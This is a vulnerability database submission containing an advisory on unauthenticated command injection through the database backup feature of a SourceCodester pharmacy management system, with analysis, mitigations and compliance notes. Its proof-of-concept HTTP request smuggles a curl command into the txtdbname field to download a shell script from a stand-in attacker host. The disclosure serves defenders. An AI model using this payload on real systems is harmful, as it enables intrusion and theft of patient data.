| Title | Sourcecodester Web-based Pharmacy Product Management System edit-product v1.0 Command Injection |
|---|
| Description | **Critical Security Advisory: Remote Command Execution in Pharmacy Management System**
**Vulnerability Summary**
Title: Unauthenticated RCE via Database Backup Functionality
Affected Version: Web-based Pharmacy Product Management System ≤ v1.0
Risk Level: Critical (CVSS 9.8)
Discovery: yaklang.io, IRify, Yakit
**Core Vulnerability Analysis**
1. **Insecure Implementation**:
- Backup functionality accepts unvalidated user input for database credentials (servername, username, password, dbname)
- Directly interpolates user-controlled $dbname into:
* File path construction ($backup_file_name)
* System command execution (exec() call)
2. **Attack Chain**:
① Attacker controls all database connection parameters
② Exploits path normalization in file operations
③ Achieves arbitrary command execution via:
```php
exec('rm ' . $backup_file_name); // $dbname可控导致RCE
```
**Technical Impact**
- Full system compromise via arbitrary command execution
- Potential PHI/PII data exfiltration (HIPAA violation)
- Possible ransomware deployment
- Supply chain contamination risk
**Proof of Concept**
```http
POST /backup.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
txtservername=attacker-mysql&txtusername=user&txtpassword=pass&txtdbname=./;curl${IFS}attacker.com/shell.sh${IFS}-o/../tmp/shell;./
```
**Mitigation Strategy**
1. **Immediate Actions**:
- Disable backup.php functionality
- Implement input validation:
```php
$dbname = preg_replace('/[^a-zA-Z0-9_-]/', '', $_POST['txtdbname']);
```
2. **Secure Coding Practices**:
- Use parameterized database connections
- Implement secure file operations:
```php
$backup_dir = '/secured/backups/';
$safe_path = realpath($backup_dir).DIRECTORY_SEPARATOR.basename($dbname).'.sql';
```
3. **System Hardening**:
- Implement least privilege for web server user
- Deploy WAF with command injection rules
- Conduct forensic audit of affected systems
**Compliance Implications**
This vulnerability constitutes:
- HIPAA Security Rule violation (§164.308)
- PCI DSS Requirement 6.5.1 non-compliance
- GDPR Article 32 breach notification requirement
**References**
- CWE-78: OS Command Injection
- OWASP Top 10 2021: A03 Injection
- NIST SP 800-115: Command Injection Countermeasures
**Note**: This vulnerability enables complete system takeover. Organizations should assume compromise and initiate incident response procedures immediately. |
|---|
| Source | ⚠️ https://github.com/yaklang/IRifyScanResult/blob/main/Web-based%20Pharmacy%20Product%20Management%20System/rce_in_backup.md |
|---|
| User | lingze (UID 83608) |
|---|
| Submission | 04/08/2025 16:42 (12 months ago) |
|---|
| Moderation | 04/16/2025 15:38 (8 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 305075 [SourceCodester Web-based Pharmacy Product Management System 1.0 Database Backup backup.php txtdbname os command injection] |
|---|
| Points | 20 |
|---|